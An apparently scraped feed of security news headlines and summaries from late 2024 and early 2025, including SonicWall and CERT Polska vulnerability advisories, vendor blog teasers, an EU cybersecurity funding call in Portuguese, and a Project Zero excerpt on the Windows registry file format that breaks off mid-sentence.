Mozilla has published the advisories (MFSA2025-01, MFSA2025-02 and MFSA2025-03) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Progress WhatsUp Gold SnmpExtendedActiveMonitor path traversal vulnerability
2025-01-08T00:00:00Z | 1736294400

https://talosintelligence.com/vulnerability_reports/TALOS-2024-2089
Nova data Open Call Europa Digital
2025-01-08T00:00:00Z | 1736294400

Está a decorrer até 27 de março de 2025, a fase de apresentação de propostas no âmbito do Pograma Europa Digital. São 102 milhões de euros disponíveis para reforçar a cibersegurança e as capacidades digitais em toda a UE. (DIGITAL-ECCC-2024-DEPLOY-CYBER-07). Ao nível da cibersegurança, 35 milhões de euros vão ser dedicados a projetos de proteção de grandes instalações industriais e infraestruturas críticas. Vão ser investidos mais 12,8 milhões de euros para continuar a criar, apoiar e alargar os Centros de Operações de Cibersegurança (SOC) nacionais e transfronteiriços. 35 milhões de euros vão ser consagrados à implantação de tecnologias e ferramentas de cibersegurança de ponta. 20 milhões de EUR destinam-se a apoiar os Estados-Membros na aplicação da legislação da UE em matéria de cibersegurança e das estratégias nacionais de cibersegurança.Áreas de ação: DIGITAL-ECCC-2024-DEPLOY-CYBER-07-SOC - National SOCs DIGITAL-ECCC-2024-DEPLOY-CYBER-07-SOCPLAT – Enlarging existing or Launching New Cross-Border SOC Platforms DIGITAL-ECCC-2024-DEPLOY-CYBER-07-SOCSYS – Strengthening the SOC Ecosystem DIGITAL-ECCC-2024-DEPLOY-CYBER-07-KEYTECH – Development and Deployment of Advanced Key Technologies DIGITAL-ECCC-2024-DEPLOY-CYBER-07-LARGEOPER - Preparedness Support and Mutual Assistance, Targeting Larger Industrial Operations and Installations DIGITAL-ECCC-2024-DEPLOY-CYBER-07-CYBERSEC-02 – Support for Implementation of EU Legislation on Cybersecurity and National Cybersecurity Strategies (2024) O Programa Europa Digital complementa investimentos no âmbito de outros programas da UE, tais como o Horizon Europe, o EU4Health, o InvestEU, o Connecting Europe Facility, bem como os investimentos no âmbito do Recovery and Resilience Facility O Programa Europa Digital é implementado através de programas de trabalho plurianuais e apoia investimentos nos seguintes setores: Computação de alto desempenho Nuvem, dados e Inteligência Artificial Cibersegurança Skills digitais avançadas Mais informações na área dedicada ao Centro Nacional de Coordenação (NCC-PT).  

https://dyn.cncs.gov.pt/pt/detalhe/art/135908/nova-data-open-call-europa-digital
SonicOS Multiple Post-authentication Vulnerabilities
2025-01-07T16:56:25Z | 1736268985

1) CVE-2024-12803 - SonicOS Post-authentication Stack-based buffer overflow vulnerabilityA post-authentication stack-based buffer overflow vulnerability in SonicOS management allows a remote attacker to crash a firewall and potentially leads to code execution. CVSS Score: 6.0 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H CWE-121: Stack-based Buffer Overflow 2) CVE-2024-12805 - SonicOS Post-authentication format string vulnerability A post-authentication format string vulnerability in SonicOS management allows a remote attacker to crash a firewall and potentially leads to code execution. CVSS Score: 6.0 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H CWE-134: Use of Externally-Controlled Format String 3) CVE-2024-12806 - SonicOS Post-authentication arbitrary file read vulnerabilityA post-authentication absolute path traversal vulnerability in SonicOS management allows a remote attacker to read an arbitrary file. CVSS Score: 4.9 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N CWE-36: Absolute Path Traversal There is no evidence that these vulnerabilities are being exploited in the wild. SonicWall strongly advises users of the SonicWall Firewall products to upgrade to the mentioned fixed release version to address these vulnerabilities. CVE: CVE-2024-12803, CVE-2024-12805, CVE-2024-12806 Last updated: Jan. 7, 2025, 4:56 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0004
SSL-VPN MFA Bypass Due to UPN and SAM Account Handling in Microsoft AD
2025-01-07T16:56:25Z | 1736268985

SSL-VPN MFA Bypass in SonicWALL SSL-VPN can arise in specific cases due to the separate handling of UPN (User Principal Name) and SAM (Security Account Manager) account names when integrated with Microsoft Active Directory, allowing MFA to be configured independently for each login method and potentially enabling attackers to bypass MFA by exploiting the alternative account name.IMPORTANT: For GEN7 and GEN8 Firewalls, we have incorporated the remediation steps described in the advisory (Comments section) into versions 7.2.0-7015 and 8.0.1-8017. These versions also include additional security enhancements. After upgrading the firewall to the specified version, the use of userPrincipalName in LDAP server configurations is once again supported. CVE: CVE-2024-12802 Last updated: April 23, 2025, 6:49 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0001
SonicOS Affected By Multiple Vulnerabilities
2025-01-07T16:56:25Z | 1736268985

1) CVE-2024-40762 - SonicOS SSLVPN Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG).Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in the SonicOS SSLVPN authentication token generator that, in certain cases, can be predicted by an attacker potentially resulting in authentication bypass. CVSS Score: 7.1 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) 2) CVE-2024-53704 - SonicOS SSLVPN Authentication Bypass Vulnerability An Improper Authentication vulnerability in the SSLVPN authentication mechanism allows a remote attacker to bypass authentication. CVSS Score: 8.2 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H CWE-287: Improper Authentication 3) CVE-2024-53705 - SonicOS SSH Management Server-Side Request Forgery VulnerabilityA Server-Side Request Forgery vulnerability in the SonicOS SSH management interface allows a remote attacker to establish a TCP connection to an IP address on any port when the user is logged in to the firewall.CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N CWE-918: Server-Side Request Forgery (SSRF) 4) CVE-2024-53706 - Gen7 SonicOS Cloud NSv SSH Config Function Local Privilege Escalation VulnerabilityA vulnerability in the Gen7 SonicOS Cloud platform NSv (AWS and Azure editions only), allows a remote authenticated local low-privileged attacker to elevate privileges to `root` and potentially lead to code execution. CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CWE-269 - Improper Privilege Management IMPORTANT: SonicWall SSL VPN SMA100 and SMA1000 series products are not affected by the vulnerabilities. SonicWall strongly advises users of the SonicWall Firewall products to upgrade to the mentioned fixed release version to address these vulnerabilities. UPDATE: Proof-of-Concepts (PoCs) for the SonicOS SSLVPN Authentication Bypass Vulnerability (CVE-2024-53704) are now publicly available. This significantly increases the risk of exploitation. Customers must immediately update all unpatched firewalls (7.1.x & 8.0.0). If applying the firmware update is not possible, disable SSLVPN. For further assistance, please contact SonicWall support. CVE: CVE-2024-40762, CVE-2024-53704, CVE-2024-53705, CVE-2024-53706 Last updated: April 24, 2025, 11:27 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
CSE’s evolved Security Review Program
2025-01-07T15:21:20Z | 1736263280

https://cyber.gc.ca/en/news-events/cses-evolved-security-review-program
Gartner® 2025 Enterprise Networking Report
2025-01-07T14:53:42Z | 1736261622

The post Gartner® 2025 Enterprise Networking Report  appeared first on Cato Networks.

https://www.catonetworks.com/resources/gartner-2025-enterprise-networking-report/
Integer-Based Buffer Overflow Vulnerability In SonicOS via IPSec
2025-01-07T11:40:15Z | 1736250015

A Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload.SonicWall PSIRT is not aware of active exploitation in the wild. No reports of a PoC have been made public and malicious use of this vulnerability has not been reported to SonicWall. CVE: CVE-2024-40765 Last updated: Jan. 8, 2025, 12:23 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0013
State-aligned actors are increasingly deploying ransomware – and that’s bad news for everyone
2025-01-07T10:00:00Z | 1736244000

The blurring of lines between cybercrime and state-sponsored attacks underscores the increasingly fluid and multifaceted nature of today’s cyberthreats

https://www.welivesecurity.com/en/business-security/state-aligned-apt-groups-increasingly-deploying-ransomware/
Security Alert (A25-01-01): Multiple Vulnerabilities in Android
2025-01-07T04:00:00Z | 1736222400

Google has released Android Security Bulletin January 2025 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Hispanic Heritage Month: Path to Collective Power - Part Two
2025-01-07T00:00:00Z | 1736208000

Discover our 2024 Hispanic Heritage Month series: overcoming adversity, fostering community, and empowering growth through inclusion.

https://www.recordedfuture.com/blog/erg-stories-hispanic-heritage-month-2024-limitless-life
Tracking Deployment of Russian Surveillance Technologies in Central Asia and Latin America
2025-01-07T00:00:00Z | 1736208000

A new report by Recorded Future’s Insikt group finds that countries across Central Asia and Latin America are increasingly basing their digital surveillance practices on Russia's System for Operative Investigative Activities (SORM). Learn more about the privacy and security risks, as well as risks to corporate organizations operating in these regions.

https://www.recordedfuture.com/research/tracking-deployment-russian-surveillance-technologies-central-asia-latin-america
Empowering District Technology Leaders with the NACC Action Guide A Roadmap to Cybersecurity Excellence
2025-01-06T18:54:17Z | 1736189657

The post Empowering District Technology Leaders with the NACC Action Guide A Roadmap to Cybersecurity Excellence appeared first on iboss.

https://www.iboss.com/blog/empowering-district-technology-leaders-with-the-nacc-action-guide/
Making an Impact: Beach Cleanup and Reforestation Event
2025-01-06T14:00:00Z | 1736172000

Akamai volunteers in Costa Rica came together to remove trash from the beach and plant trees ? and they learned how their everyday choices affect the planet.

https://www.akamai.com/blog/sustainability/2025/jan/making-an-impact-beach-cleanup-and-reforestation-event
AI moves to your PC with its own special hardware
2025-01-06T10:00:00Z | 1736157600

Seeking to keep sensitive data private and accelerate AI workloads? Look no further than AI PCs powered by Intel Core Ultra processors with a built-in NPU.

https://www.welivesecurity.com/en/cybersecurity/ai-moves-pc-special-hardware/
S-RM announced as the newest member of the Distology partner network
2025-01-06T08:59:51Z | 1736153991

London, 6 January 2025. Leading global cyber security and corporate intelligence consultancy S-RM has announced a new channel distribution partnership with market leading cybersecurity solutions provider and distributor, Distology.

https://www.s-rminform.com/news/s-rm-announced-as-the-newest-member-of-the-distology-partner-network
The 2024 Vulnerability Forecast: Year in Review
2025-01-06T00:30:00Z | 1736123400

In calendar year 2024 we had another record breaking 40,704 CVEs published.

https://www.first.org/blog/20250106-Vulnerability-Forecast-Year-in-Review
The 2024 Vulnerability Forecast: Year in Review
2025-01-06T00:30:00Z | 1736123400

In calendar year 2024 we had another record breaking 40,704 CVEs published.

https://www.first.org/blog/20250106-Vulnerability-Forecast-Year-in-Review
Cato CTRL Threat Brief: CVE-2024-49112 and CVE-2024-49113 – Windows LDAP Vulnerabilities (“LDAPBleed” and “LDAPNightmare”)
2025-01-03T19:44:37Z | 1735933477

Executive Summary  In a world where dozens of CVEs are released every day, there are vulnerabilities, and there are vulnerabilities. The latest Microsoft Windows LDAP (Lightweight Directory Access Protocol) vulnerabilities, which were coined not once but twice (“LDAPBleed” and “LDAPNightmare”), clearly belong to the shortlist of new and dangerous CVEs. CVE-2024-49112, a remote code execution... The post Cato CTRL Threat Brief: CVE-2024-49112 and CVE-2024-49113 – Windows LDAP Vulnerabilities (“LDAPBleed” and “LDAPNightmare”)  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-threat-brief-cve-2024-49112-and-cve-2024-49113-ldap-vulnerabilities/
Gary Marcus: Taming Silicon Valley | Starmus highlights
2025-01-03T10:00:00Z | 1735898400

The prominent AI researcher explores the societal impact of artificial intelligence and outlines his vision for a future in which AI upholds human rights, dignity, and fairness

https://www.welivesecurity.com/en/we-live-science/gary-marcus-taming-silicon-valley-starmus-highlights/
The year 2024 at the National Coordination Centre
2025-01-02T14:08:19Z | 1735826899

2024 is coming to an end and, with it, the first EU-funded project of the National Coordination Centre (NCC-FI). The past year has been eventful. During 2024, NCC-FI provided EUR 1.5 million in financial support to micro and small and medium sized enterprises for the implementation of state-of-the-art information security solutions, provided training on preparing applications for EU funding and organised events.

https://www.kyberturvallisuuskeskus.fi/en/news/year-2024-national-coordination-centre
The year 2024 at the National Coordination Centre
2025-01-02T14:08:19Z | 1735826899

2024 is coming to an end and, with it, the first EU-funded project of the National Coordination Centre (NCC-FI). The past year has been eventful. During 2024, NCC-FI provided EUR 1.5 million in financial support to micro and small and medium sized enterprises for the implementation of state-of-the-art information security solutions, provided training on preparing applications for EU funding and organised events.

https://www.kyberturvallisuuskeskus.fi/en/news/year-2024-national-coordination-centre
Deprecation of the first version of Dangerous websites Warning List
2025-01-02T12:00:00Z | 1735819200

The Dangerous websites Warning List will soon be five years old. Over this time it stopped millions of attempts to connect to malicious domains and has become our most effective tool in the fight against phishing websites.

https://cert.pl/en/posts/2025/01/hole-v1-deprecation-notice/
Vulnerability in Kentico CMS software
2025-01-02T11:00:00Z | 1735815600

XSS (Cross-site Scripting) vulnerability has been found in Kentico CMS software (CVE-2024-12907).

https://cert.pl/en/posts/2025/01/CVE-2024-12907/
Vulnerabilities in CTFd software
2025-01-02T10:00:00Z | 1735812000

CERT Polska has received a report about 2 vulnerabilities (CVE-2024-11716 and CVE-2024-11717) found in CTFd software.

https://cert.pl/en/posts/2025/01/CVE-2024-11716/
SASE Everywhere: Cato’s Solution for Seamless China Connectivity
2025-01-02T07:49:13Z | 1735804153

(Cato Networks is using local partners that are duly licensed by the Chinese government to provide connectivity services out of China. This collaboration allows Cato to provide its services in China via authorized providers) Enterprises expanding their operations often face the challenge of also ensuring seamless and secure connectivity in China, a critical market with... The post SASE Everywhere: Cato’s Solution for Seamless China Connectivity appeared first on Cato Networks.

https://www.catonetworks.com/blog/catos-solution-for-seamless-china-connectivity/
Your next big career move? SASE certification with Cato
2025-01-02T07:45:32Z | 1735803932

The modern IT landscape is anything but simple. Digital transformation has changed how enterprises operate – but it’s also created a tangle of complexity. For years, organizations have tried to keep up with business needs like modernizing outdated networks, securing hybrid work, expanding operations, moving to the cloud, or even defending against a barrage of... The post Your next big career move? SASE certification with Cato  appeared first on Cato Networks.

https://www.catonetworks.com/blog/your-next-big-career-move-sase-certification-with-cato/
Recommended cyber security contract clauses for cloud services (ITSM.50.104)
2024-12-31T15:01:44Z | 1735657304

https://cyber.gc.ca/en/guidance/recommended-cyber-security-contract-clauses-cloud-services-itsm50104
Crawling out of December: the 2024 recap
2024-12-31T10:00:00Z | 1735639200

It might happen that by the end of this post you're going to try to decide who wrote this blog post, a large language model (LLM) or Gary. And you'd be right to ponder that and delve into the intricacies of the language used that gives away LLMs, for this is the time of the year when we can get away with publishing a blog post with barely any review (future Gary will deal with the potential, nay, likely fallout I guess). As we often do in the last post of a year, we're looking at what happened on Google Search Central in 2024 according to an LLM (or Gary), and maybe hinting at what might be coming in 2025 (but maybe this is just a hook to keep you reading...).

https://developers.google.com/search/blog/2024/12/crawling-out-of-december
FIRST POST: Oct-Dec 2024
2024-12-31T00:00:00Z | 1735603200

Message from the Chair; The Growing Role of Cyber Diplomacy in Managing Digital Conflicts; APCERT & FIRST Regional Symposium; FIRST Membership Committee - Updated Liaison Process; FIRST Welcomes New Members and Thanks Sponsoring Teams!; Trainer Recognition; Growth Stack Media Q4 PR Highlights: CISA Endorsement & Emerging Industry Leadership; Special Interest Group Updates; Early Bird Registration for FIRSTCON25 Copenhagen Ends February 10!; Upcoming Events

https://www.first.org/newsroom/post/202412
Vulnerability in Infinix Mobile Weather application
2024-12-30T11:00:00Z | 1735556400

Vulnerability CVE-2024-12993 allowing revealing the user’s location has been found in Infinix Mobile com.rlk.weathers application.

https://cert.pl/en/posts/2024/12/CVE-2024-12993/
NSFOCUS ISOP Listed in The Security Analytics Platform Landscape Report by Forrester
2024-12-30T07:51:53Z | 1735545113

SANTA CLARA, Calif., December 30, 2024 – We are thrilled to announce that NSFOCUS was selected as the notable vendor of Forrester The Security Analytics Platform Landscape, Q4 by its ISOP (Intelligent Security Operations Platform) with built-in NSFGPT AI assistant and AI-empowered security operation scenarios. “The security analytics platform is the core of the security […] The post NSFOCUS ISOP Listed in The Security Analytics Platform Landscape Report by Forrester appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

https://nsfocusglobal.com/nsfocus-isop-listed-in-the-security-analytics-platform-landscape-report-by-forrester/
Unlock Modern Connectivity: SD-WAN vs. MPLS
2024-12-30T07:45:45Z | 1735544745

The WAN landscape is evolving at a rapid pace, driven by demands of cloud, mobility, and globalization. MPLS (Multiprotocol Label Switching), a legacy transport technology, once the gold standard, now struggles to meet modern business requirements.   The Challenges with MPLS  MPLS connects locations by routing traffic over private, dedicated circuits through a centralized architecture. It... The post Unlock Modern Connectivity: SD-WAN vs. MPLS  appeared first on Cato Networks.

https://www.catonetworks.com/blog/unlock-modern-connectivity-sd-wan-vs-mpls/
High Threat Security Alert (A24-12-18): Vulnerability in Palo Alto Products
2024-12-30T04:00:00Z | 1735531200

Palo Alto has published a security advisory to address a vulnerability in PAN-OS.

https://www.govcert.gov.hk/en/alerts_detail.php
This month in security with Tony Anscombe – December 2024 edition
2024-12-27T10:00:00Z | 1735293600

From attacks leveraging new new zero-day exploits to a major law enforcement crackdown, December 2024 was packed with impactful cybersecurity news

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-december-2024-edition/
Recent Cases of Watering Hole Attacks, Part 2
2024-12-26T02:00:00Z | 1735178400

Continuing from the previous article, Part 2 covers another case of a watering hole attack. This time, we will look at the case of a media-related website exploited in 2023. Flow of the attack Figure 1 shows the flow of...

https://blogs.jpcert.or.jp/en/2024/12/watering_hole_attack_part2.html
Non-Intrusive Web Recon: Techniques from Chrome DevTools Recorder
2024-12-25T00:00:00Z | 1735084800

Introduction: The Art of Non-Intrusive Web Recon Hello, I’m pizzacat83 (@pizzacat83 ), a software engineer at Flatt Security Inc. When hunting for bugs, understanding the behavior of a target application is invaluable. The more knowledge you gain about the application—where each functionality resides, how pages and APIs interconnect—the greater your ability to pinpoint weaknesses and unravel vulnerabilities. Imagine a tool that could seamlessly assist with this process, extracting key insights from the browser in real-time as you navigate through the application. A tool that, while you click through the interface, captures the underlying DOM structure, traces interactions, and reveals valuable data connections—all without disrupting your flow. This would make it possible to map the application’s behavior as you go, without needing to slow down to document every detail manually.

https://flatt.tech/research/posts/non-intrusive-web-recon-techniques-from-chrome-devtools-recorder/
Crawling December: CDNs and crawling
2024-12-24T10:00:00Z | 1735034400

Content delivery networks (CDNs) are particularly well suited for decreasing latency of your website and in general keeping web traffic-related headaches away. This is their primary purpose after all: speedy delivery of your content even if your site is getting loads of traffic. The "D" in CDN is for delivering or distributing the content across the world, so transfer times to your users is also lower than just hosting in one data center somewhere. In this post we're going to explore how to make use of CDNs in a way that improves crawling and users' experience on your site, and we also look at some nuances of crawling CDN-backed sites.

https://developers.google.com/search/blog/2024/12/crawling-december-cdns
Closing the IT Skills Gap: How SASE Empowers and Retains Top Talent
2024-12-23T14:34:48Z | 1734964488

Purpose Beyond Pay: Keeping Talent Engaged  In today’s competitive job market, employees are increasingly seeking a sense of purpose and belonging in their work environments. As McKinsey reports, purpose has become a pivotal factor in employee retention. IT leaders who fail to connect their teams’ day-to-day tasks to a broader mission risk losing top talent... The post Closing the IT Skills Gap: How SASE Empowers and Retains Top Talent appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sase-empowers-and-retains-top-talent/
Top 8 Ways To Align Business Value With IT Outcomes Using Cato SASE Cloud
2024-12-23T13:25:00Z | 1734960300

In today’s rapidly evolving digital landscape, IT leaders are under constant pressure to deliver outcomes that align directly with business value. Gone are the days when technology decisions were made in isolation. Today, every IT investment must contribute to operational efficiency, cost savings, security, and scalability—all while empowering the business to innovate and grow. The... The post Top 8 Ways To Align Business Value With IT Outcomes Using Cato SASE Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/align-business-value-with-it-outcomes-using-cato-sase-cloud/
Chris Hadfield: The sky is falling – what to do about space junk? | Starmus highlights
2024-12-23T10:00:00Z | 1734948000

The first Canadian to walk in space dives deep into the origins of space debris, how it’s become a growing problem, and how we can clean up the orbital mess

https://www.welivesecurity.com/en/we-live-science/chris-hadfield-sky-falling-space-junk-starmus-highlights/
High Threat Security Alert (A24-12-17): Multiple Vulnerabilities in Sophos Firewall
2024-12-23T04:00:00Z | 1734926400

Sophos has published a security advisory to address multiple vulnerabilities in Sophos Firewall.

https://www.govcert.gov.hk/en/alerts_detail.php
Ransomware Empowerment Training
2024-12-23T00:30:00Z | 1734913800

The FIRST Multi-Stakeholder Ransomware SIG is very pleased to announce the release of the first version of the Ransomware Empowerment training. This has been a significant undertaking, requiring many months of dedicated effort from our dear SIG members. We have made it our priority to ensure that this training is TLP:CLEAR, so that it can be of benefit to all.

https://www.first.org/blog/20241220-FIRST-Ransomware-Training
Ransomware Empowerment Training
2024-12-23T00:30:00Z | 1734913800

The FIRST Multi-Stakeholder Ransomware SIG is very pleased to announce the release of the first version of the Ransomware Empowerment training. This has been a significant undertaking, requiring many months of dedicated effort from our dear SIG members. We have made it our priority to ensure that this training is TLP:CLEAR, so that it can be of benefit to all.

https://www.first.org/blog/20241220-FIRST-Ransomware-Training
Checking It Twice: Profiling Benign Internet Scanners — 2024 Edition
2024-12-23T00:00:00Z | 1734912000

A comprehensive analysis of benign internet scanning activity from November 2024, examining how quickly and thoroughly various legitimate scanning services (like Shodan, Censys, and others) discover and probe new internet-facing assets. The study deployed 24 new sensors across 8 geographies and 5 autonomous systems, revealing that most scanners found new nodes within 5 minutes, with ONYPHE leading in first contacts.

https://www.greynoise.io/blog/checking-it-twice-profiling-benign-internet-scanners----2024-edition
Targeted manipulation: Iran's social engineering and spear phishing campaigns
2024-12-20T14:03:07Z | 1734703387

https://cyber.gc.ca/en/guidance/targeted-manipulation-irans-social-engineering-and-spear-phishing-campaigns
Major Enhancements to Akamai API Security, Q4 2024
2024-12-20T14:00:00Z | 1734703200

The Akamai API Security updates 3.38, 3.39, and 3.40 include configurable blocking, the automatic creation of posture findings from runtime incidents, and more.

https://www.akamai.com/blog/security/2024/dec/major-enhancements-akamai-api-security-q4-2024
Protecting Unmanaged Devices with Armis and Akamai
2024-12-20T13:00:00Z | 1734699600

https://www.akamai.com/blog/security/2024/dec/protecting-unmanaged-devices-with-armis-and-akamai
Is Regulatory Harmonization on the Horizon? The Medical Devices Cybersecurity Landscape in the EU and the US
2024-12-20T11:59:03Z | 1734695943

This is a guest post by Critical Software RunSafe Security and Critical Software are partners in delivering comprehensive safety and security solutions for critical sectors in Europe and the US. Imagine modern healthcare services without medical devices. You can’t? Neither can we. Medical devices perform a vital role in the patient experience, from diagnosis to […] The post Is Regulatory Harmonization on the Horizon? The Medical Devices Cybersecurity Landscape in the EU and the US appeared first on RunSafe Security.

https://runsafesecurity.com/blog/regulatory-harmonization-medical-devices/
Vulnerability in DirectAdmin Evolution Skin software
2024-12-20T11:00:00Z | 1734692400

XSS (Cross-site Scripting) vulnerability (CVE-2024-10385) has been found in DirectAdmin Evolution Skin software.

https://cert.pl/en/posts/2024/12/CVE-2024-10385/
ESET Research Podcast: Telekopye, again
2024-12-20T10:00:00Z | 1734688800

Take a peek into the murky world of cybercrime where groups of scammers who go by the nickname of 'Neanderthals’ wield the Telekopye toolkit to ensnare unsuspecting victims they call 'Mammoths'

https://www.welivesecurity.com/en/podcasts/eset-research-podcast-telekopye-again/
S-RM is approved as a Licensed Cyber Security Service Provider in Malaysia
2024-12-20T08:37:58Z | 1734683878

20 December 2024 – Kuala Lumpur and Hong Kong – Leading cyber security and corporate intelligence agency S-RM has today announced approval from the National Cyber Security Agency (NACSA), Malaysia, as a Licensed Cyber Security Service Provider under the Cyber Security Act 2024 [Act 854].

https://www.s-rminform.com/news/s-rm-approved-cybersecurity-provider-malaysia
Security Alert (A24-12-16): Multiple Vulnerabilities in Microsoft Edge
2024-12-20T04:00:00Z | 1734667200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
The Windows Registry Adventure #5: The regf file format
2024-12-19T19:03:00Z | 1734634980

Posted by Mateusz Jurczyk, Google Project Zero As previously mentioned in the second installment of the blog post series ("A brief history of the feature"), the binary format used to encode registry hives from Windows NT 3.1 up to the modern Windows 11 is called regf. In a way, it is quite special, because it represents a registry subtree simultaneously on disk and in memory, as opposed to most other common file formats. Documents, images, videos, etc. are generally designed to store data efficiently on disk, and they are subsequently parsed to and from different in-memory representations whenever they are read or written. This seems only natural, as offline storage and RAM come with different constraints and requirements. On disk, it is important that the data is packed as tightly as possible, while in memory, easy and efficient random access is typically prioritized. The regf format aims to bypass the reparsing step – likely to optimize the memory/disk synchronization process – and reconcile the two types of data encodings into a single one that is both relatively compact and easy to operate on at the same time. This explains, for instance, why hives don't natively support compression (but the clients are of course free to store compressed data in the registry). This unique approach comes with its own set of challenges, and has been a contributing factor in a number of historical vulnerabilities. Throughout the 30 years of the format's existence, Microsoft has never released its official specification. However, the data layout of all of the building blocks making up a hive (file header, bin headers, cell structures) are effectively public through the PDB symbols for the Windows kernel image (ntoskrnl.exe) available on the Microsoft Symbol Server. Furthermore, the Windows Internals book series also includes a section that delves into the specifics of the regf format (named Hive structure). Lastly, forensics experts have long expressed interest in the format for analysis purposes, resulting in the creation of several unofficial specifications based on reverse engineering, experimentation and deduction. These sources have been listed in my earlier Learning resources blog post; the two most extensive specifications of this kind can be found here and here. The intent of this post is not to repeat the information compiled in the existing resources, but rather to highlight specific parts of the format that have major relevance to security, or provide some extra context where I found it missing. A deep understanding of the low-level regf format will prove invaluable in grasping many of the higher-level concepts in the registry, as well as the technical details of software bugs discussed in future blog posts.The hive structure: header, bins and cells On the lowest level, data in hives is organized in chunks of 4 KiB (0x1000 bytes), incidentally the size of a standard memory page in the x86 architecture. The first 4 KiB always correspond to the header (also called the base block), followed by one or more bins, each being a multiple of 4 KiB in length. The header specifies general information about the hive (signature, version, etc.), while bins are an abstraction layer designed to enable the fragmentation of hive mappings in virtual memory – more on that later. Each bin starts with a 32-byte (0x20) header, followed by one or more cells that completely fill the bin. A cell is the smallest unit of data in a hive that has a specific purpose (e.g. describes a key, value, security descriptor, and so on). The data of a cell is preceded by a 32-bit integer specifying its size, which must be a multiple of eight (i.e. its three least significant bits are clear), and is either in the free or allocated state. A free (unused) cell is indicated by a positive size, and an allocated cell is indicated by a negative one. For example, a free cell of 32 bytes has a length marker of 0x00000020, while an active cell of 128 bytes has its size encoded as 0xFFFFFF80. This visibly demonstrates the hybrid on-disk / in-memory nature of the hive format as opposed to other classic formats, which don't intentionally leave large chunks of unused space in the files. The overall file structure is illustrated in the diagram below: In the Windows kernel, internal functions responsible for handling these low-level hive objects (base block, bins, cells) have names starting with "Hv", for example HvCheckHive, HvpAllocateBin or HvpViewMapCleanup. This part of the registry codebase is crucial as it forms the foundation of the registry logic, enabling the Configuration Manager to easily allocate, free, and access hive cells without concerning itself with the technical details of memory management. It is also a place with significant potential for optimizations, such as the incremental logging added in Windows 8.1, or section-based registry introduced in Windows 10 April 2018 Update (RS4). Both of these mechanisms are well described in the Windows Internals 7 (Part 2) book. While integral to the correct functioning of the registry, hive management does not constitute a very large part of the overall registry-related codebase. In my analysis of the registry code growth shown in blog post #2, I counted 100,007 decompiled lines of code corresponding to this subsystem in Windows 11 kernel build 10.0.22621.2134. Out of these, only 10,407 or around 10.4% correspond to hive memory management. This is also reflected in my findings: out of the 52 CVEs assigned by Microsoft, only two of them were directly related to a Hv* function implementation – CVE-2022-37988, a logic bug in HvReallocateCell leading to memory corruption, and CVE-2024-43452, a double-fetch while loading hives from remote network shares. This is not to say that there aren't more bugs in this mechanism, but their quantity is likely proportional to its size relative to the rest of the registry-related code. Let's now have a closer look at how each of the basic objects in the hive are encoded and what information they store, starting with the base block.Base block The base block is represented by a structure called _HBASE_BLOCK in the Windows Kernel, and its layout can be displayed in WinDbg: 0: kd> dt _HBASE_BLOCK nt!_HBASE_BLOCK    +0x000 Signature        : Uint4B    +0x004 Sequence1        : Uint4B    +0x008 Sequence2        : Uint4B    +0x00c TimeStamp        : _LARGE_INTEGER    +0x014 Major            : Uint4B    +0x018 Minor            : Uint4B    +0x01c Type             : Uint4B    +0x020 Format           : Uint4B    +0x024 RootCell         : Uint4B    +0x028 Length           : Uint4B    +0x02c Cluster          : Uint4B    +0x030 FileName         : [64] UChar    +0x070 RmId             : _GUID    +0x080 LogId            : _GUID    +0x090 Flags            : Uint4B    +0x094 TmId             : _GUID    +0x0a4 GuidSignature    : Uint4B    +0x0a8 LastReorganizeTime : Uint8B    +0x0b0 Reserved1        : [83] Uint4B    +0x1fc CheckSum         : Uint4B    +0x200 Reserved2        : [882] Uint4B    +0xfc8 ThawTmId         : _GUID    +0xfd8 ThawRmId         : _GUID    +0xfe8 ThawLogId        : _GUID    +0xff8 BootType         : Uint4B    +0xffc BootRecover      : Uint4B The first thing that stands out is the fact that even though the base block is 4096-bytes long, it only really stores around 236 bytes of meaningful data, and the rest (the Reserved1 and Reserved2 arrays) are filled with zeros. For a detailed description of each field, I encourage you to refer to the two unofficial regf specifications mentioned earlier. In the sections below, I share additional thoughts on the usage and relevance of some of the most interesting header members.Sequence1, Sequence2 These 32-bit numbers are updated by the kernel during registry write operations to keep track of the consistency state of the hive. If the two values are equal during loading, the hive is in a "clean" state and doesn't require any kind of recovery. If they differ, this indicates that not all pending changes have been fully committed to the primary hive file, and additional modifications must be applied based on the accompanying .LOG/.LOG1/.LOG2 files. From a security point of view, manually controlling these fields may be useful in ensuring that the log recovery logic (HvAnalyzeLogFiles, HvpPerformLogFileRecovery and related functions) gets executed by the kernel. This is what I did when crafting the proof-of-concept files for CVE-2023-35386 and CVE-2023-38154.Major, Minor These are some of the 